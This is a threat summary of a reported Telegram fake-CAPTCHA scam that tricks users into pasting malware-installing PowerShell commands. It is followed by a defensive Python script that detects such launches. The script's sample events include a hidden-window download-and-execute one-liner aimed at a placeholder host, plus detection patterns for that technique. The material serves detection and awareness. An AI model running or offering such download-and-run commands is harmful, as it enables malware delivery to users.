Telegram Captcha Tricks You Into Running Malicious PowerShell Scripts
Summary: Threat actors are exploiting news about Ross Ulbricht to lure users into a malicious Telegram channel, tricking them into executing PowerShell commands that install malware. This new variant of the “Click-Fix” tactic masquerades as a verification process, leveraging fake accounts to gain trust. Users are warned to be cautious of executing any commands copied from online sources, especially in PowerShell or the Windows Run dialog.

Threat Actor: Unknown
Victim: Unsuspecting users

Key points:

  • Threat actors use fake verified accounts of Ross Ulbricht to direct users to malicious Telegram channels.
  • The verification process involves executing PowerShell commands under the guise of a CAPTCHA system.
  • The malware delivered may include Cobalt Strike, a tool used for gaining unauthorized access to systems.
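
A triage check for the pattern described above, added here as an example (not from the original article): it scans process-creation events for PowerShell started directly from explorer.exe, the parent process when a command is pasted into the Run dialog, combined with a hidden window, an encoded command or a download-and-execute one-liner. Field names follow Sysmon Event ID 1; the heuristics, sample events, host name and agent path are constructed assumptions.

```python
import re

PS_IMAGES = ("powershell.exe", "pwsh.exe")
DOWNLOAD = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)

def _is_param(tok, full, aliases=()):
    """True if tok is a prefix of parameter name `full` or one of its aliases."""
    name = tok[1:].lower()
    return tok[0] in "-/" and bool(name) and (full.startswith(name) or name in aliases)

def clickfix_reasons(event):
    """Return why a process-creation event looks like a pasted Click-Fix command."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    # Run dialog and Explorer launches have explorer.exe as parent; PowerShell
    # started by a management agent does not, so this rule ignores it.
    if image not in PS_IMAGES or parent != "explorer.exe":
        return []
    cmd = event["CommandLine"]
    toks = cmd.replace('"', " ").replace("'", " ").split()
    reasons = []
    for tok, nxt in zip(toks, toks[1:] + [""]):
        if _is_param(tok, "windowstyle") and nxt.lower() == "hidden":
            reasons.append("hidden window")
        if _is_param(tok, "encodedcommand", ("ec",)) and len(nxt) >= 16:
            reasons.append("encoded command")
    if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
        reasons.append("download and execute")
    return reasons

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
AGENT = r"C:\Program Files\ExampleAgent\agent.exe"  # hypothetical management agent
BLOB = "QQBCAEMARABFAEYARwBIAA=="  # constructed placeholder, not a real payload
# Constructed events for illustration only; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iex (irm https://verify.example.invalid/c)"'},
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": f'"{PS}"'},
    {"ParentImage": AGENT, "Image": PS, "CommandLine": f"powershell -enc {BLOB}"},
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": f"powershell -NoP -Enc {BLOB}"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(clickfix_reasons(ev) or "no match", "|", ev["CommandLine"])
```

A match is a lead for review rather than a verdict: a plain interactive PowerShell window opened from Explorer produces no reasons, while the same flags from a non-Explorer parent need a separate rule.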

Source: https://www.bleepingcomputer.com/news/security/telegram-captcha-tricks-you-into-running-malicious-powershell-scripts/